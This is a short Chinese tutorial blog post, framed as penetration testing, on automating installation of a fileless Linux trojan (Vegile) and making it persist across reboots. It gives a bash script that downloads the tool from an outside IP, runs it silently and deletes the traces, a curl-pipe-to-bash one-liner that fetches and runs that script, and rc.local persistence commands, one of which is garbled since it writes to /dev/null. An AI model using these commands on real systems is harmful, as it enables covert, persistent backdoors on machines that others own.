今天继续给大家介绍渗透测试相关知识,本文主要内容是配置后门创建脚本与开机自启动。
一、使用脚本自动创建后门
在上文Linux无文件木马程序渗透测试复现中,我们介绍了使用Vegile工具配置Linux系统的无文件木马。今天,我们在上文的基础上,配置实现脚本的自动化和开启自启动。
上文的渗透测试结果我们可以写成一个脚本,从而大大减少我们后期的操作。
我们将上文中的过程,编写为一个脚本,脚本内容如下所示:
#!/bin/bash
cd /tmp
wget 192.168.136.199/Vegile.tar.gz && tar xf Vegile.tar.gz && cd Vegile && ./Vegile --i second >>/dev/null 2>&1 && rm -rf /tmp/Vegile*
之后,我们在除此渗透获取SHELL后,直接执行命令:
bash <(curl -s -L 192.168.136.199/exp.sh)>>/dev/null 2>&1
上述命令表示下载该脚本的内容,并自动执行。
这样,就剩下了我们其他的复杂操作了。
二、配置开机自启动
此外,上述过程改进后,还存在一个问题,即目标设备在关机重启后,我们的木马程序就会失效,为了解决之一问题,我们需要把该目录程序添加成开启自启动。
我们在已经获取的SHELL中,执行命令:
echo "bash <(curl -s -L 192.168.136.199/exp.sh)>>/dev/null 2>&1" >> /dev/null 2>&1
chmod +x /etc/rc.d/rc.local
这样,目标设备重启后,又会重新执行我们的木马程序,以此来实现我们木马程序的持久化了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200